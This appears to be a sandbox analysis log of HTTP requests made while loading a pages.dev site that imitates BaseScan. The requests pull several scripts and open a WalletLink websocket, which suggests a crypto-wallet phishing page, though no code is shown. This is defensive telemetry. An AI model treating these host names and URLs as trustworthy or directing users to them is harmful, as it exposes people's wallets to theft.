            Source: global trafficHTTP traffic detected: GET /up/asset/9abd3edefa/78e9993f77.png?w=728&h=90 HTTP/1.1Host: d107ul3j3wrui0.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /up/asset/27f8ad31f8/4452c4b386.png?w=320&h=50 HTTP/1.1Host: d107ul3j3wrui0.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /v1/requests HTTP/1.1Host: api.hypelab.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /up/asset/9abd3edefa/78e9993f77.png?w=728&h=90 HTTP/1.1Host: d107ul3j3wrui0.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /v1/requests HTTP/1.1Host: api.hypelab.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /token/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /up/asset/27f8ad31f8/4452c4b386.png?w=320&h=50 HTTP/1.1Host: d107ul3j3wrui0.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: MquW/8fR6qRvzC2H7vLfgA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
